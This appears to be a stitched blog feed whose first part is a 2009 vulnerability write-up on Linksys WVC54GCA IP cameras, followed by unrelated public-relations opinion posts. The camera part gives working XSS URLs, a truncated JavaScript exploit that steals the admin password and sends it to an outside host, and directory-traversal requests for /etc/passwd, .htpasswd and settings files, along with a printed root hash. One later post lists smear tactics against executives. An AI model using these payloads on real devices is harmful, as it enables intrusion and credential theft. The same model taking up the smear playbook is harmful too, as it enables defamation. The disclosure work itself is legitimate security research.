/adm/file.cgi?next_file=Wsecurity.htm

Causes the Wi-Fi WEP/WPA/WPA2 encryption key to be returned to the browser:

Obviously this is bad news, as it means that every time the aforementioned pages are visited, credentials travel the clear (the WVC54GCA IP camera doesn't have SSL/TLS support).

Now, I know there are people out there who might find these types of issues not worth fixing. The following is the thinking behind their reasoning.

In the case of the admin password disclosure, some people would argue that this issue wouldn't make a difference security-wise, since the camera uses basic authentication which transmits credentials in the clear (base64 encoding) anyway.

In the case of the wireless encryption key disclosure, some individuals point out that if you can sniff the Wi-Fi encryption key, it means that either 1) you're already part of the wireless network which means you must already know the key, or 2) you are part of the network via an ethernet connection which means that you don't need the wireless key at all.

So why fix these issues then? Well, think of client-side attacks for instance. If you keep reading I'll show you how you can (for instance) use XSS to steal the admin password from the aforementioned page. If the admin password wasn't returned by the web interface, this attack would not be possible, despite basic authentication being used by the camera.

Several XSS bugs

Yes, XSS is the roach of the Internet, it's everywhere and we can't seem to be able to get rid of it! Of course, Linksys IP cameras are no exception. Finding XSS vulns requires virtually no skills (unless you are trying to bypass a strict filter logic). Also, hunting for XSS vulns can be kind of boring. As pdp usually says, "it's not finding XSS bugs which is interesting, but what you can do with it". I couldn't agree more.

Boring PoCs:

/main.cgi?next_file=%3Cimg%20src%3dx%20onerror%3dalert(1)%3E

/img/main.cgi?next_file=%3Cimg%20src%3dx%20onerror%3dalert(1)%3E

/adm/file.cgi?next_file=%3Cscript%3Ealert(1)%3C/script%3E

/adm/file.cgi?todo=xss&this_file=%3cscript%3ealert(1)%3c/script%3e

XSS bug #1 works regardless of the authentication state of the victim user. The rest do require the victim user to be logged-in for the injected JS to run within the context of the camera's domain sandbox.

As you can see in the first two XSS vulns, we use img tags, rather then script tags, due to closing script tags being filtered. Once again, the developers have chosen to perform filtering against some parameters, albeit poor filtering.

Admin Password theft XSS PoC

The following is the PoC exploit which steals the admin user's password.

// evil.js : malicious JS file, typically located on attacker's site
// payload description: steals Linksys WVC54GCA admin password via XSS
// tested on FF3 and IE7
// based on code from developer.apple.com
function loadXMLDoc(url) {
	req = false;
    	// branch for native XMLHttpRequest object
    	if(window.XMLHttpRequest && !(window.ActiveXObject)) {
    		try {	
			req = new XMLHttpRequest();
        	} 
		catch(e) {
			req = false;
        	}
    	} 
    	// branch for IE/Windows ActiveX version	
	else if(window.ActiveXObject) {
       		try { 
        		req = new ActiveXObject("Msxml2.XMLHTTP");
      		} 
		catch(e)  {
        		try {
          			req = new ActiveXObject("Microsoft.XMLHTTP");
        		} 
			catch(e) {
          			req = false;
        		}
		}
    	}
	if(req) {
		req.onreadystatechange = processReqChange;
		req.open("GET", url, true);
		req.send("");
	}
}
// end of loadXMLDoc(url)

function processReqChange() {
   	// only if req shows "loaded"
    	if (req.readyState == 4) {
        	// only if "OK"
        	if (req.status == 200) { 
			// dirty credentials-scraping code
			var bits=req.responseText.split(/\"/);	
			var gems="";
			for (i=0;i



http://192.168.1.115/adm/file.cgi?next_file=%3cscript%20src=http://evil.foo/evil.js%3e%3c/script%3e

If you capture the traffic while testing the exploit against yourself you will see the admin login and password being sent to google.com:



Attack Requirements

In order for this exploit to work, the camera admin user must be logged in when the attack occurs. This means that a bit of social engineering is required. For instance, the attacker could setup a forum to help users of the WVC54GCA camera by providing tips, FAQs, etc. If the attacker is serious he could use black hat SEO and ad campaigns such as Google AdWords to attract Linksys camera users to visit the site containing the malicious XSS URLs. You get the idea!

Testing Info

All Disclosure of Credentials and XSS vulnerabilities successfully tested on:

WVC54GCA
Firmware V1.00R22 and V1.00R24 (latest available as on 23rd April 2009)
---
recent posts from the gnucitizen network:
Websecurify Websuite Incidents (PHP-CGI, CVE-2012-2311)
Websuite Scanner Tutorial
This is How We Code
Retro Websecurify (v0.4) Video
Websuite Scanner Preview Video



Hacking Linksys IP Cameras (pt 3)
Thu, 23 Apr 2009 00:52:28 +0000
This article is a continuation of the following GNUCITIZEN articles, which include an introduction to the topic and also some initial observations: Hacking Linksys IP Cameras (pt 1), Hacking Linksys IP Cameras (pt 2).

Unlike the previous two vulnerabilities I released, the vulnerabilities I’m releasing in this post are perhaps not so useful to break into the device as you need access to the admin account to exploit them. Nevertheless, these vulnerabilities might be useful for users who want to hack their Linksys IP cameras for modding purposes, rather than being used by an attacker aiming to crack into someone else’s camera.

Two directory traversal vulnerabilities

Today, instead of releasing just one vulnerability I’ll be releasing two! These two vulnerabilities have helped me understand more about how the WVC54GCA wireless camera internals and I’m hoping they will also work on other Linksys camera models. Please let me know if you successfully test them on other models too!

Both vulnerabilities are of type directory traversal, aka arbitrary file retrieval, and they both affect the same CGI program: /adm/file.cgi. Please note that these vulnerabilities are different to CVE-2004-2507/BID 10476 which affected /main.cgi instead.

1st directory traversal hole

It seems that the next_file parameter is not filtered enough when submitted to /adm/file.cgi, so that either of the following requests will return the content of any file whose location is known (/etc/passwd in this case):

/adm/file.cgi?next_file=%2fetc%2fpasswd
/adm/file.cgi?next_file=%2fetc/passwd
/adm/file.cgi?next_file=%2e.%2f%2e.%2f%2e.%2f%2e.%2fetc%2fpasswd

2nd directory traversal hole

In the case of the second directory traversal hole, the vulnerable parameter (this_file) is not filtered at all whatsoever. So hex-encoding special symbols is not required:

/adm/file.cgi?todo=pwnage&this_file=/etc/passwd

The following is the content of the Linux passwd file containing the encrypted root password. Remember that the WVC54GCA comes with BusyBox Linux by default which you can confirm by opening bin/busybox with any of the vulnerabilities previously discussed. I’m curious to know if the passwd file contains the same password on all cameras of the same model, or even if Linksys is also using the same password on other models:

root:9szj4G6pgOGeA:0:0:root:/root:/bin/sh

Notice that when exploiting the first vulnerability, we need to convert forward slashes to %2f which is its hex-encoding equivalent. This is because the developer (poorly) attempted to filter directory traversal sequences when data is submitted via the next_file parameter. In the third example, we also partially hex-encode ../ sequences in order to avoid being blocked by the script which results in a forbidden error.

Needless to say, if the root password is not too strong you should be able to crack it using john or you favorite password cracking tool. I loaded passwd with john for a few hours on an old laptop and nothing was found, so I’m guessing the root password is not extremely weak. If you model comes with the telnet daemon running by default, cracking that password should give you root shell access.

Unfortunately, as I mentioned in the first post of these series, the WVC54GCA camera comes with a telnet daemon included, but it’s off by default. I haven’t managed to enable the telnet daemon and get a remote root shell yet although I suspect it might be possible by modifying the bin firmware image and uploading it again.

What can we do with these vulnerabilities?

Well, I tried finding files that contain interesting information that helps you understand the camera better. The following are some examples:


/etc/passwd : traditional-DES-format password file with no salt
/usr/local/www/img/.htpasswd : HTTP credentials stored in cleartext
/usr/local/www/adm/.htpasswd : contains same data as previous file
/etc/system.conf : all camera settings stored in cleartext including admin password, wifi encryption key, etc …
/usr/local/bin/thttpd.conf : web server config file confirming the daemon runs as root, which is the only system account present anyway
/etc/init.d/rcS  :  here we see the line that starts the telnet daemon (/usr/sbin/telnetd) commented out
/etc/def_sys.conf : camera’s default settings
/etc/system.conf : camera’s current settings
/var/nc.log : network connections logs
/etc/group
/etc/inittab
/proc/cpuinfo : processor details
/proc/meminfo
/proc/version : OS details
/proc/uptime


Finding a file upload vulnerability should allow us to overwrite the /etc/init.d/rcS file and eventually manage to start the telnet server after reboot. By overwriting the /etc/passwd file with our own we should be able to add our own root password. Unfortunately, I haven’t discovered any vulnerability that would allow me to upload files to arbirary locations. If you do discover one, please let me know. I’d love to hear the details.

Testing Info

Directory traversal vuln #1 successfully tested on:

WVC54GCA
Firmware V1.00R22 and V1.00R24 (latest available as on 23rd April 2009)


Directory traversal vuln #2 successfully tested on:

WVC54GCA
V1.00R24 (latest available as on 23rd April 2009)

Although I never tested the second traversal vulnerability on Firmware V1.00R22, I definitely suspect it will work on this previous firmware version as well.
Please note that the aforementioned vulnerabilities are different to BID 10476 which affected the /main.cgi program rather than /adm/file.cgi.
---
recent posts from the gnucitizen network:
Websecurify Websuite Incidents (PHP-CGI, CVE-2012-2311)
Websuite Scanner Tutorial
This is How We Code
Retro Websecurify (v0.4) Video
Websuite Scanner Preview Video



Hacking Linksys IP Cameras (pt 2)
Mon, 20 Apr 2009 22:27:14 +0000
This article is a continuation of the following GNUCITIZEN article, which includes an introduction to the topic and also some initial observations: Hacking Linksys IP Cameras (pt 1).

Privilege escalation via arbitrary file retrieval

The second vulnerability I’ll be releasing is an arbitrary(ish) file retrieval vulnerability. It’s not fully arbitrary because you can only retrieve the contents of files located within the same directory where the vulnerable CGI program is located. However, this is enough to allow a neat privilege escalation vector where a restricted user that only has permissions to view the video stream, can gain access to the admin account password.

The problem lies within the next_file parameter which is submitted to the main.cgi program. Although main.cgi does filter characters typically used in directory traversal sequences such as dots (.) and forward slashes (/), it seems that the developer didn’t consider that retrieving the contents of files within the current directory could create a security hole. By simply retrieving the contents of .htpasswd a restricted user which only has permissions to access the video stream can access the credentials of the admin account and also the credentials of other restricted users (if applicable).

The only restriction that needs to be bypassed, is dots (.) symbols being filtered. i.e.: the following will not work and will result in a forbidden error:

/img/main.cgi?next_file=.htpasswd

But replacing the dot (.) symbol with its hexadecimal equivalent:

/img/main.cgi?next_file=%2ehtpasswd

Will result in the contents of .htpasswd being returned. i.e.:

admin:adminpassw0rd user1:pass1 user2:pass2

Like most IP cameras, the Linksys WVC54GCA allows administrators to grant access to the video stream to selected users only (rather than anonymous users who don’t need to authenticate). In this case, the admin user can click on the Users menu and tick the Only users in database option (please see screenshot below). After this, all that is needed is to add a username/password pair for the account to grant video-viewing access to:



Well, the feature discussed above can be rendered useless by exploiting the vulnerability I have described, since it allows restricted users to retrieve the admin password.

Testing Info

Successfully tested on:

WVC54GCA
Firmware V1.00R22 and V1.00R24 (latest available as on 20th April 2009)


Please note that this vulnerability is different to BID 10476 which affected the /main.cgi program rather than /img/main.cgi.
---
recent posts from the gnucitizen network:
Websecurify Websuite Incidents (PHP-CGI, CVE-2012-2311)
Websuite Scanner Tutorial
This is How We Code
Retro Websecurify (v0.4) Video
Websuite Scanner Preview Video



Miss “Accountable” 2008
Fri, 12 Dec 2008 20:23:39 +0000


The beauty award this year goes to the International Federation of Organic Agriculture Movements (IFOAM), followed by the European Bank of Reconstruction and Development and Unicef. The lowest reputation scores, however, were received by International Olympic Committee and NATO. Not surprising at all ! You should not expect that  military and sport organizations would have been ranked higher than that, especially when their image is closely related to the general image of the services they offer and the image the places where their headquartered are based. Being accountable is also a tough task for most corporations as they fail to deploy effective policies and active management systems.

The Contest: According to the latest survey of One World Trust (a British Think Tank), the IFOAM, along with 29 other powerful organizations, have been assessed in terms of their accountability to stakeholders and wider public. The scope of the research was based on the assessment of four major criteria such as transparency, participation with outsiders, evaluation and complains handling. Turns out that none of the companies actually managed to score higher than 70 percent accountability which is very low and insufficient result. The official report also states:

A score of 70 percent indicates that an organisation has policies in place that meet only some good practice principles and the basic management systems to support their implementation.  This is the floor, not the ceiling, of accountability capabilities. If global organisations are to be part of the solution to global challenges, there needs to be a step change in their approaches to accountability.  They need to start implementing the more challenging accountability reforms which truly empower external stakeholders to hold an organisation to account. Organisations must also take the necessary steps to embed accountability in their culture and ensure it is being translated into practice.

The other interesting conclusion that has been made is that all of the evaluated companies failed to show good scores (more than 50 percent) in their transparency policies and complaint handling procedures.  It is funny that Transparency International (a global organization that tries to fight corruption) takes one of the lowest positions in this chart. Why is this so important? Well, from a Black PR perspective, these are pretty severe vulnerabilities. If an attacker manage to hack into the corporate complaint tracking software and steals all of the important data, he can easily turn that into a massive negative campaign. The affected organization will be not only caught into a very awkward situation, but it will be unable to respond properly to the increasing flow of stakeholders complaints. This also leads to intense media attention and general public dissatisfaction.

One more thing – I did a little research on my own and I found out that the Google Page Ranks of the less accountable organizations is way higher than the the Page Rank of the organizations on the top of the list. However, if you type their name and the word reputation into the search box, you will find that the first couple of pages are filled with negative publications and comments . I guess popularity is not always proportionally related to the general stakeholders’ respect.
---
recent posts from the gnucitizen cutting-edge network:
Websecurify Websuite Incidents (PHP-CGI, CVE-2012-2311)
Websuite Scanner Tutorial
This is How We Code
Retro Websecurify (v0.4) Video
Websuite Scanner Preview Video



Crisis Communication Is Like …Surfing
Wed, 10 Dec 2008 19:57:31 +0000


I don’t know about you but today I have started writing my New Year’s Resolution List. One of the things I am eager to do next year is to learn how to surf. It’s cool, risky and very challenging. What I like most about it is the sense of uncertainty and the way you need to survive with a minimum set of resources.

Surfin is like crisis management, don’t you think? If you actually compare some of the basic tutorials in both disciplines, you will probably find a lots of similarities. So, once you master the ability to stay upright on the board, you can easily gain a confidence for dealing with some of the most severe crisis in the corporate world.

How to Start

When a crisis occurs, the first thing to consider is finding the balance point. Use your company’s strengths and all those positive qualities that cannot be doubted by the others. This will help you to balance out all the negative publications and unfair accusations. For example, if your organization is being socially responsible and undertakes many charitable events, this actually can help to save your stakeholders’ trust and turn the crisis into unexpected corporate profit.

The second crucial habit that must be developed is the ability to respond as quickly as possible to the changing environment. The speed is absolutely everything for both surfing and crisis management. It gives you not only a competitive edge, but also the power to predict every negative outcomes. At the same time, do not forget to keep it low once you get the situation back in control.  In almost every zoology book it is stated that the most dangerous moments for the target is right after its escape form the predator.  So if you keep looking at your feet, you will definitely fall down again. Instead, you should “cover the back of your head” and protect all your vital assets from further damages. Stay “under the water” as long as you can, but never lose the honesty in your conversations.

Safety should always be in the back of your mind, which is a reason why you should never be surfing alone. You never know what might go wrong even on the smallest of waves – its good to have someone who can help you out if you get into trouble.
---
recent posts from the gnucitizen cutting-edge network:
Websecurify Websuite Incidents (PHP-CGI, CVE-2012-2311)
Websuite Scanner Tutorial
This is How We Code
Retro Websecurify (v0.4) Video
Websuite Scanner Preview Video



Back In The Classroom: Noam Chomsky on Corporate Propaganda Techniques
Fri, 05 Dec 2008 20:03:59 +0000
I just stumbled across an old video on YouTube and I think it is worth sharing. The video is about the origin of the Public Relations industry in the US and why the modern democratic societies need to be manipulated.

 

As it turns out, the free public mind is one of the greatest threats to many corporations and political regimes as it could easily destroy their long-term goals, ideologies and operations. Chomsky also says that the idea of democracy gives an enormous, anarchic power to the regular people, which could be quite harmful to the society in general.  Actually, propaganda is one of the Chomsky’s favorite topics as he wrote many books about it – Media Control: The Spectacular Achievements of Propaganda, Manufacturing Consent: The Political Economy of the Mass Media and Propaganda and The Public Mind: Conversations with Noam Chomsky. Great reads for those who are interested.
---
recent posts from the gnucitizen cutting-edge network:
Websecurify Websuite Incidents (PHP-CGI, CVE-2012-2311)
Websuite Scanner Tutorial
This is How We Code
Retro Websecurify (v0.4) Video
Websuite Scanner Preview Video



A Note For Hillary: Stop Tarnishing The Democratic Values
Wed, 03 Dec 2008 22:41:08 +0000


It is official! Hillary Clinton is finally appointed as the new Secretary of State. Congrats!!!! Let me tell you, this lady is everything, but a loser and will do everything just to get to the power of the state. It seems like she is absolutely capable of taking every political position you can think about of – a first lady, a senator, a president wanna-be, a vice president and if all this fail why not a head of international affairs. There is nothing wrong with this, except that the recent political history is entirely dominated by families like the Bushes and the Clintons. Looks like once you taste the power of the White House, it is not easy to give it up. I cannot help but wonder, where is the real change that we are awaiting for so long?

Funny enough, just few weeks ago both Hillary Clinton and Barack Obama said that they want to improve America’s standing in the world. The Democart’s victory was easily labeled by different media outlets as “historic” and has put hopes for a brighter future not only in US, but also in the whole world itself. Barack Obama is not just the first black president; he is a symbol of new political standards, a chance of economic survival and a representative of  new class of world leaders. For a first time in many years (maybe after Nelson Mandela’s jail release), people all over the world were united in something bigger than their own social troubles. They were proud of the choice they made and were actually interested in following the news, counting the votes and somehow been personally involved in the whole competition.

What happened?

Let me take you back to the time when Hillary Clinton tried to “nominate” herself as a potential candidate for vice-presidency. Every rational political analyst at that time fiercely criticized the opportunity of pairing the “two former rivals” into the same election list. Moreover, it was said to be an absolutely wrong move and a second chance for Bill Clinton to overshadow the upcoming cabinet. Hillary was also seen as an obstacle that could put many prospective voters off the Obama’s political platform. Not to mention about the numerous dirty tricks that both candidates used to play to each other. Actually the fight between them was even more bitter and more aggressive than the one with the Republicans.

Today, after the election, the partnership between Obama and Clinton has been suddenly seen as logical conclusion of a long, exhausting race. However there are still a couple of issues that must be considered.  Hillary is not the type of a woman that will be easily controlled. No matter how suitable or experienced she is for being a Secretary of State, she also has a wide network of business/political connections which could put her into a great dominance over the rest of the crew. This means that her political leverage will be getting stronger and stronger each day,  which kind of makes this team ineffective at its very beginning.

Bottom Line:

One of the good things about Democracy is the idea of free choice. The American people were actually unable to vote about the alliance between Hillary and Obama (as it would happen if she was officially named his running mate). Now they are forced to accept it. All this raises the question if we ever had the opportunity to choose between different democratic alternatives or everything was already set up as part of a nasty, political scenario. No matter how good it sounds in theory, the change has been already made, unfortunately not by us.

Definitely not a good sign for the American reputation!
---
recent posts from the gnucitizen cutting-edge network:
Websecurify Websuite Incidents (PHP-CGI, CVE-2012-2311)
Websuite Scanner Tutorial
This is How We Code
Retro Websecurify (v0.4) Video
Websuite Scanner Preview Video



“Big”, “Small” and “Fat” Reputations (The Healthy Edition)
Thu, 27 Nov 2008 19:36:47 +0000


In the mood of the upcoming Christmas feasts, here are our tips of how to stay corporate fit during the season. As you know, during this time of the year most companies are quite busy with the execution of various sales campaigns or are rushing to close important deals right before New Year’s Eve. Christmas also means lots of parties, reunions and gatherings. However that urge for having a fresh start sometimes cost millions to the organizations as they tend to neglect their competitors and therefore easily become victims of lethal reputation attacks. While many attribute the cause for this as an excessive preoccupation during the holidays, much of the Black PR cases are due to the carelessness of managers to assess security threats and their actual frequency. CEOs also foolishly underestimate the objectives of negative campaigning and refuse to believe that someone will ever dare to affect their flawless corporate systems.

I don’t think is even worth mentioning it here how idiotic approach this is and to be honest many organizations deserve their own reputation misery. So instead of spending quality time with friends and families, many employees end up the year setting crisis teams and fighting bad publicity. Sounds like lots of fun, isn’t it?

What is the healthy diet?

First of all, I think it is very important for corporations to understand the power of a good reputation. Although it is not something that you can touch and hold in your hands, having a good name (personal or a brand) is the only thing that matters at the end of the day. It affects not only your annual financial reports, but also it gives you a competitive edge and a whole new meaning of your marketing strategies, internal relations and in general sales performance. Companies with strong reputation are more likely to recover from severe crises, than the ones with inconstant behavior and negative image.

Secondly, there is a common misunderstanding which I want to clarify. Usually when PRs talk about reputation, they tend to refer to it as good or bad one. The truth is that the reputation of an organization can be much more colorful as it can take many different shapes or sizes. Keep also in mind that the corporate image means different things for the different stakeholder groups, such as employees, suppliers, shareholders and the media. It is vitally important to keep the balance between them as you risk to put yourself in a very untrustworthy position.

The size always matters

There is no big or small reputation. It is all relative. Companies with big reputations are those with a greater popularity among the general public. This s the case with Body Shop. Everyone think of Body Shop as a company that is deeply concerned with the environment, fair trading and biologically clean products. This is something that nobody doubts or dare to counter.

Organizations with small reputations are those that fail to established any strong images in the minds of the audience. Usually those are start-ups or corporations with controversial past and lack of political protections. Even worse – firms with no individuality and international media presence.

The question here is what will happen when these two types of reputation collide. Obviously it will be much easier for a bigger organization to smash down the smaller one. It has wider network of connections, more money and better PR team. The smaller competitor won’t even noticed that they are being a victim of Black PR campaign or even if they do, nobody will believe them or even want to invest in an entity without any market future.

However if a start-up succeeds in the defamation of a bigger company, it will automatically position itself as better consumer alternative and even secure its own market place. This opportunity is especially seductive for the retail industry. The only difficult thing here is the creating of an effective Black PR strategy and a new marketing plan for after that.

So, take the tape measure and prepare for the upcoming festivals!
---
recent posts from the gnucitizen cutting-edge network:
Websecurify Websuite Incidents (PHP-CGI, CVE-2012-2311)
Websuite Scanner Tutorial
This is How We Code
Retro Websecurify (v0.4) Video
Websuite Scanner Preview Video



Britney Spears And The Art of Self-defamation
Fri, 21 Nov 2008 20:33:15 +0000


There is a new documentary coming up this weekend on MTV about Britney Spears. It is called Britney: For the Record and it aims to rebuild her reputation after months of a total meltdown. It is expected to be a heart-breaking story about her emotional collapse and the way she completely lost her way to the top.  Funny enough, MTV was  blamed a year ago that it deliberately helped destroying her image by letting her on stage of the MTV Music Awards 2007. If you remember well she was brutally criticized by the tabloids at that time for her poor performance and horrible look, which put Spears even into a deeper depression. Britney easily became a synonym of psychological disorder and a topic of numerous humorous plots. For more then a year people all over the world were literally shocked by her tabloid-chronicled personal spiral that has included rumors of drug and alcohol abuse, a scalp-shearing breakdown, a few trips through rehab, visits from the department of child welfare, and a lot of genital exposure.

What is happening now?

For the last couple of months, the falling POP-star suddenly raised from the ashes. It was not something that I expected to occur so soon, at least not with the same magnitude. Today, Britney Spears looks like an entirely different person. She behaves well, spends quality time with her two sons, hits the top charts with a brand new single and even won two MTV awards. Larry Rudolph, her manager, kindly refers to as the official beginning of the comeback. However I couldn’t help but wonder, is it really a comeback or a well-designed reputation strategy?

There are a few disturbing things which make me reason that Britney Spears’s brake-down could be part of a complex, self-created Black PR campaign. I know this sounds insane! Who could possibly do this to himself, but if you think about it – Why NOT???

First of all, Britney released her fifth album, Blackout, right in the peak of her emotional troubles. Ask any reputation advisor and he will tell you that this is a wrong move, especially when you carry such a horrible media karma. That is completely true, but not if your singles are all about depression, self-lost and bad decisions. What would be a better way to promote your label, but your own self-destructing life. Keep also in mind that the target audience of the album is mainly composed of teenagers and I don’t even want to start discussing the emotional problems this particular group have to go through. What I am trying to say is that, Britney’ life may be seen from some as a total wreck, but for others (young troubled girls) it is empathy, etc.

On the other hand, people love to see their idols falling down. They want to assure themselves that the celebrities are just regular people as everyone else and have the same domestic and professional problems. This is how I can personally explain the whole hysteria around reality programs and behind the scenes features.

Believe me, Britney Spears’ record company knew this extremely well and as a result Blackout set the record for the biggest-selling digital album debut by a female artist in a week.

New Album requires a New Image

The next album of Britney Spears, Circus, is set to be released on 2th Dec (her birthday). The date it is not accidental. It should mark her comeback and new personal stage of life. She will be portrayed as more mature and emotionally stronger woman and she will probably start aiming at different type of audience.

Britney already looks different. She has better style, better figure, boosted self-esteem and professional attitude. She seems quite womanized and in peace with herself. All she needs to do now is to start excusing herself and her recent behavior. She is aiming at people’s compassion and fortunately for her, we all like to forgive.
---
recent posts from the gnucitizen cutting-edge network:
Websecurify Websuite Incidents (PHP-CGI, CVE-2012-2311)
Websuite Scanner Tutorial
This is How We Code
Retro Websecurify (v0.4) Video
Websuite Scanner Preview Video



Collateral Reputation Damage
Wed, 19 Nov 2008 23:09:42 +0000


There is a new reputation term I stumbled across yesterday (via Authenticorganizations blog) so I thought it is worth discussing it. It is called collateral reputation damage and the idea behind it is that some companies could be incidentally defamed, just by having random similarities with another, less respectable organizations or individuals. According to the author:

The collateral damage, (is) not intentional damage, because the folks taking action don’t intend to damage the organization�s reputation. Instead, the damage occurs through guilt by association

How does it work?

The most popular example of collateral damage is when two similar names (let’s refer to them as A and B) are being negatively associated with each other. Usually there is no any relevant connection between them, except their names, nicknames, corporate symbols or initials. Visual resemblance is also possible. The only requirement here is one of the subjects (let’s say A) to have an established bad reputation in people’s minds.  So, every time when people hear about the other one, B, they will subconsciously associate it with the negative qualities and characteristics of A. Fortunately, this works only for a very short period of time. However, it could be really damaging only if A is in the middle of a corporate/personal scandal.

This is what happened with Sarah Pailn and the Chiliean wine Palin Syrah. According to Chris Tavelli (a wine bar owner), Palin Sayrah was one of the best selling wines in his pub before her nomination as a Republican V.P.  People were constantly put off of its low price and questionable quality.

How the affected party should react?

Well, there is no a straightforward answer really. Everything depends on the specific situation and whether the affected organization is willing to take any further steps to rebuild its reputation. The main point here is the harmed company or the individual must distant itself from the one with a bad image and make sure to demonstrate different corporate values. If the company publicly complains about its reputation loss and provide enough evidences about it, such as significant financial drops, then it has the real chance to increase its popularity, find new markets or even entirely re-position itself. As I always say, it all depends on the abilities of finding an opportunity in the crisis.
---
recent posts from the gnucitizen cutting-edge network:
Websecurify Websuite Incidents (PHP-CGI, CVE-2012-2311)
Websuite Scanner Tutorial
This is How We Code
Retro Websecurify (v0.4) Video
Websuite Scanner Preview Video



Top Reputation Nightmares for CEOs
Thu, 13 Nov 2008 17:07:26 +0000


Ask any reputation strategist and he will tell you that the most vulnerable asset of any corporation is its very own leader.  Actually CEO’s reputation represent around 49%-65% of overall corporate reputation and thus it is inevitable part of numerous Black PR scenarios. The reason for this is because it requires much less efforts and time to defame a person, than to concentrate on the disparagement of an entire organization.

The objectives of the smear campaigns, on the other hand, could also be different. Usually there are two simple goals behind every reputation attack. The first one is directed at the personal qualities of the target and it aims his official resignation. Most of the time these types of attacks come from inside the company and are used when the leader is no longer suitable for the general corporate performance. It is also very convenient when he/she cannot be dismissed directly or is a great obstacle for someone’s interest. The second reason for CEO defamation is when the black- hats are trying to distract the attention of the industry’s stakeholders or are aiming to cause extra troubles for the organization. It is not a surprise that this is a very common situation during important events like new product launching or some forthcoming acquisitions.

Due to the high volume of recent reputation attacks, I tried to summarize the most common malicious scenarios that CEO’s could be involved in. Of course, there are a lot more scenarios than those that I have listed. Keep in mind that everything depends on the creativity of the attacker. The golden rule here is that the more uncommon the plan is, the more effective the results would be.


Sexual Harassment – This is the most popular type of attack that a leader could face. It is quite easy to be proved and works almost every time.  All you need to do is to find a suitable victim, sufficient evidences and a tabloid editor, willing to pay enough for the story.  Once the scandal is triggered, you can just sit down and relax.
Hypocrisy – The point here is to reveal a discrepancy between leader’s official attitude and his actual deeds.  The latest example is the Sara Palin fashion affair. The problem there was not that she likes to wear very expensive, designer clothes, but the fact she is not a regular American girl as she had been trying to portray herself.
Membership of controversial groups – This is a really powerful approach. If you can prove that the CEO is a part of a mob gang, religious cult or secret society, than his media crucifixion will be certain. The corporate long term strategies will also be affected.
Professional Incompetence – if the leader is incapable of making good decisions and taking responsibilities of his action , then the quality of the corporate services will be put under a serious suspicion. This is pretty scary for most of the B2B type of companies.
Misuse of corporate resources (Embezzlement) – Financial wrongdoing  and unethical behavior are probably the most significant threats to every corporate reputation.Such is the case with the Deyaar’s ex-CEO, Zack Shahin, who was suspected of embezzling over $33 millions into his personal accounts. The scandal broke earlier this year and let to his immediate discharge as the head of the biggest property developer in Dubai. According to the Gulf media sources, the company is still trying to recover its tarnished reputation and to regain the trust of its shareholders.
I want to clarify that the person who was accused of embezzling Deyaar Development’ resources is Zack Shahin , not Nasser Al-Shaikh as was stated earlier before. Mr. Al-Shekih is the current Chairman of the company and The General Director of Dubai Department of Finance. Spin Hunters apologies for any inconvenience we might caused with this post.

Indictment – When it comes to CEO’s reputation, ethical conduct is always on the top. Bernard Ebbers, the former CEO of WorldCom, learned that the hard way when he was indicted on federal charges stemming from the multi-billion dollar accounting fraud at the telecommunications giant.  He was also charged of conspiracy and false filing with the Securities Exchange Commission.  Today he is serving his sentence at the FCI Oakdale.
Personality and Lifestyle – The main goal of the attacker here is to reveal all the dirty secrets of the target that are not publicly known. If the leader is a drug addict, a racist or a homosexual and this type of an image is in total clash with the position he takes, then not only the reputation of the organization, he is associated with, will suffer but also the reputation of the entire industry itself.


Bottom Line: CEO’s reputation will always be a target of  professional smear campaigns. The best thing CEOs can do is to be completely honest and sincere with his PR strategic team, as this is the only way to tackle all pending reputation risks.
---
recent posts from the gnucitizen cutting-edge network:
Websecurify Websuite Incidents (PHP-CGI, CVE-2012-2311)
Websuite Scanner Tutorial
This is How We Code
Retro Websecurify (v0.4) Video
Websuite Scanner Preview Video



Negative Word-Of-Mouth made easy with Tell-a-Friend
Tue, 04 Nov 2008 15:51:11 +0000


There is a new widget that caught my eye the other day and I have been playing with it ever since.  It’s called Tell-a-Friend and its general purpose is to help users to share any type of information without leaving the website where it is installed.  Nothing new, you may say, but the point I want to make is that this tool actually enables visitors to access their friends with much greater speed and scope. So, instead of remembering all the contact details of your LinkedIn network, you can now spread your messages with less efforts and boring authentication requests. Convenient for ones, quite scary for others! Tell-a-Friend is a two-edged sword that can successfully build and destroy your reputation in a matter of minutes. Everything depends on the professional skills of both the black-hats and the reputation management consultants.

It is not a surprise that most of the serious PR agencies today design Word-of-Mouth (WOM) strategies as part of their promotion services. They are well aware of the power of peer-to-peer sharing and that most potential costumers heavily rely on the advice and the input of the people they trust. A professionally executed WOM campaign is hundreds of times more effective than any other advertising platform combined with the best communication tactics, especially when it can also help boosting the sales performance and corporate operational profit.

One of the most specific features of WOM marketing is that it barely relies on any substantial facts, but personal opinions. So, even if you read something about yourself on the Web that it is not entirely true, the measures you can take are pretty limited. It is almost impossible to start legal actions against a whole community, especially when the initial source of the rumor is hard to be identified. It is also quite stupid for a company to blame someone because of his personal believes and thus all marketing books share the opinion that customer is always right.

 I will stop here. I think it is pointless to explain further the importance of  Word-of-Mouth and its global impact on corporate reputations.  However, I believe it is crucial to discuss its usage as rumor spreading accelerator and general defamation tool.

What makes Negative WOM so powerful?

It is proven that people trust negative information way more than any superlatives. If you hear something bad about someone, this is more likely to be remembered than the high volume of positive stories you can find about that very same person.  The reason for this are the libel messages with their embellishing nature which causes the drama effect. This means that if you start a rumor about something,,at the end of the day it will sound totally different from its initial form. In fact, every time when somebody repeats the story, the impact will be much bigger and stronger over the target audience. None of the other communication tools enable you to do that.

The other thing I would like to mention is the tempo, with which viral messages could be disseminated.  This is extremely important for every defamation campaign , because it disables the target to react promptly on existing reputation attacks. If the target delays its official respond or fail to give a reasonable explanation of the buzz (with enough number of facts), then the allegations will be subconsciously confirmed by the audience.  Moreover, this delay may actually help the rumors to spread even more and this is how the target’s reputation can be permanently damaged.

In conclusion, I can only say that most of the big corporations tend to underestimate the power of negative communication. They are willing to spend enormous amount of money for creating a positive buzz, but not fighting the negative one. In short term perspective, this may look reasonable, but keep in mind that there will always be someone that doesn’t like your product and will try everything to take you down. As I always say, it is up to you to decide whether this is going to happen.
---
recent posts from the gnucitizen cutting-edge network:
Websecurify Websuite Incidents (PHP-CGI, CVE-2012-2311)
Websuite Scanner Tutorial
This is How We Code
Retro Websecurify (v0.4) Video
Websuite Scanner Preview Video



Smear of the Year
Mon, 27 Oct 2008 17:29:00 +0000


The high volume of recent smear campaigns has led to the need of a special acknowledgment.

